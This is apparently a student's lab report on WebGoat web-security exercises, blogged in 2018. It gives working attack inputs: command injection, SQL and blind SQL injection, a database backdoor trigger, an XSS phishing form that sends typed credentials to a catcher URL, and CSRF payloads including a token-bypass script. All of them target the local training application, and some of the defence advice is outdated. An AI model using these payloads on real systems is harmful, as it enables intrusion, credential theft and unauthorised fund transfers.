EXP9 Web安全基础实践

EXP9 Web安全基础实践

基础问题回答

1.SQL注入攻击原理,如何防御?

原理:SQL注入是一种将SQL代码添加到输入参数中,传递到服务器解析并执行的一种攻击手法。SQL注入攻击是输入参数未经过滤,然后直接拼接到SQL语句当中解析,执行达到预想之外的一种行为,简单来说就是让应用运行本不应该运行的SQL代码。
防御:
1.对输入的数据进行过滤,过滤掉敏感字符。加密数据库。
2.在PHP配置文件中Register_globals=off;设置为关闭状态,作用将注册全局变量关闭。
3.提高数据库命名技巧,对于一些重要的字段根据程序的特点命名,取不易被猜到的
4.开启PHP安全模式Safe_mode=on;

2.XSS攻击的原理,如何防御?

原理:攻击者利用网站漏洞,输入可以显示在页面上的、对其他用户造成影响的HTML代码;由于受害者浏览器对目标服务器的信任,当其访问目标服务器上被注入恶意脚本的页面后,这段恶意脚本可以顺利执行,实现获取用户cookie并可以利用用户身份进行非法操作的目的。
防御:
在服务器段限制输入格式,输入类型,输入长度以及输入字符
要注意避免使用一些有潜在危险的html标签,这些标签很容易嵌入一些恶意网页代码。

3.CSRF攻击原理,如何防御?

什么是CSRF:CSRF(Cross-site request forgery)跨站请求伪造,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。
原理:通过伪装来自受信任用户的请求来利用受信任的网站。是一种依赖web浏览器的、被混淆过的代理人攻击。
防御:用户在浏览其它站点前登出站点;在浏览器会话结束后清理浏览器的cookie;尽量不要在页面的链接中暴露用户隐私信息;避免全站通用的cookie,严格设置cookie的域。

实验准备

  • 安装webgoat
    1.打开的时候发现没有安装:

2.下载好后,将它放在home里,开启webgoat

3.当界面停留在上图所示时,最小化不要关闭。打开浏览器,输入localhost:8080/WebGoat

4.选择默认账号、密码即可登陆成功

  • 火狐浏览器firebug
    1.安装火狐浏览器(附上教程链接)
    link
    2.使用时,可以在页面需要修改的地方右键打开

完成列表


实验过程

Injection Flaws

1.Command Injection

在目标主机上执行系统命令.

  • 在BackDoors.help旁边加上
"& netstat -an & ipconfig"

  • .选中修改后的值再点view,可以看到命令被执行,出现系统网络连接情况

2.Numeric SQL Injection

注入SQL字符串,使其可以查看所有天气的数据。

  • 利用firebug在任意一个值后面加上 or 1=1(永真)

  • 点击GO,就能看到所有天气

3.Log Spoofing

我们输入的用户名会被追加到日志文件中

  • 在User Name文本框中输入
xxx%0d%0aLogin Succeeded for username:admin

,其中%0d是回车,%0a是换行符

  • 攻击成功

4.XPATH Injection

要求使用帐户Mik/Test123,实现查看其他员工的数据

  • 尝试构造永真式
user name:gjt' or 1=1 or 'a'='a
password:gjt
  • 成功

5.String SQL Injection

  • 构造一个永真式“1”,那么不管前面的WHERE是否成立都能执行,所以构造语句'or 1='1,成功得到了全部的信用卡号

6.LAB: SQL Injection

Stage 1:String SQL Injection

使用String SQL注入来绕过身份验证

  • 修改password的最大程度8→100

  • 以用户Neville登录,在密码栏中输入' or 1=1 --永真式进行SQL注入

  • 成功

Stage 3:Numeric SQL Injection
  • 先使用上一题的办法登录进Larry的账户

  • Boss的工资最高,所以把其中的value值改为

101 or 1=1 order by salary desc --

,这样老板的信息就会被排到第一个

  • 点击ViewProfile进去,即可查看老板的详细信息

7.Database Backdoors

  • 输入注入语句:101; update employee set salary=10000,成功把该用户的工资涨到了10000

  • 再使用语句

101;CREATE TRIGGER yqhBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='20154329@qq.com' WHERE userid = NEW.userid

创建一个后门,把表中所有的邮箱和用户ID都设为我的。

8.Blind Numeric SQL Injection

-构造输入语句

101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') >

数值 );,根据返回的语句是否合法判断pin值的范围。

  • 这里使用二分法,确实有些费时费力,需要从2000,3000,2500,2250,2375,2313,2344,2360,2368,2364......一直试下去,最后确定值是2364,输入2364后破解成功:

9.Blind String SQL Injection

  • 1.输入101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) >'z' );进行猜解,发现结果为Account number is valid,账户有效。

猜测是否是大写字母

  • 2.接下来依次猜测之后的字母
    输入101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) >'h' );最后确定用户名为Jill

Cross-Site Scripting (XSS)

1.Phishing with XSS

  • 1.使用XSS和HTML插入制作一个钓鱼网站,将其输在search框中,代码如下:
</form>
  <script>
function hack(){ 
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
} 
  </script>
<form name="phish">
<br><br>
<HR>
  <H2>This feature requires account login:</H2>
<br>
  <br>Enter Username:<br>
  <input type="text" name="user">
  <br>Enter Password:<br>
  <input type="password" name = "pass">
<br>
  <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

  • 输入后下拉网页,会有用户名和密码的框出现,随意输入用户名和密码

  • 成功

2.Reflected XSS Attacks

  • 我们将带有攻击性的URL作为输入源,比如
<script>alert("23320154329gjt");</script>

,就会弹出对话框

  • 成功

3.Stored XSS Attacks

  • 在信息框里输入
<script>alert("20154329gjt");</script>,

点击提交之后,留言板上会出现这条信息的标题

  • 点击标题链接,攻击成功

CSRF

1.Cross Site Request Forgery

  • 在信息框内输入(这句话的意思是将Funds即金钱转到自己的账户里),点击提交之后可以看到信息

  • 点击标题链接,攻击成功

2.CSRF Prompt By-Pass

  • 在信息框输入
<img src="attack?Screen=src值&menu=menu值&transferFunds=5000" 
width="1" height="1"> 
<img src="attack?Screen=src值&menu=menu值&transferFunds=confirm" 
width="1" height="1">

  • 点击标题链接,攻击成功

3.CSRF Token By-Pass

  • 在Title输入:gjt
  • 在Message输入构造的代码
<script>
    var tokensuffix;
     
    function readFrame1()
    {
        var frameDoc = document.getElementById("frame1").contentDocument;
        var form = frameDoc.getElementsByTagName("form")[0];
        tokensuffix = '&CSRFToken=' + form.CSRFToken.value;
     
        loadFrame2();
    }
     
    function loadFrame2()
    {
        var testFrame = document.getElementById("frame2");
        testFrame.src="attack?Screen=src值&menu=menu值&transferFunds=5000" + tokensuffix;
    }
</script>
 
<iframe src="attack?Screen=src值&menu=menu值&transferFunds=main"
    onload="readFrame1();"
    id="frame1" frameborder="1" marginwidth="0"
    marginheight="0" width="800" scrolling=yes height="300"></iframe>
 
<iframe id="frame2" frameborder="1" marginwidth="0"
    marginheight="0" width="800" scrolling=yes height="300"></iframe>

  • 点击Submit,然后在Message List里点击“CSRF Token By-Pass Attack”,如下图所示:

实验心得与体会

量的积累可以导致质变,确实是这样,做第一个的时候还有点懵,做的多了慢慢就像打通了任督二脉,突然就懂了。XXS会利用站点内受信任的用户来盗取数据,而CSRF则通过伪装来自受信任用户的请求来利用网站。Besides,网络上所有的东西都是靠各种各样的代码运行起来的,SQL注入真的很机智啊,在此之前我从来不会想过,输入用户名的地方输入了奇奇怪怪的东西会出现意想不到的结果。还有就是使用firebug修改网页上的代码,因为无知,所以我觉得很多实验内容都很神奇。网络对抗课为我打开了新世界的大门,虽然这个学期很快就要结束了,但是路漫漫其修远兮,还有太多的东西需要了解、需要学习,想想还有点小激动。

posted @ 2018-05-25 09:09  20154329  阅读(80)  评论(0编辑  收藏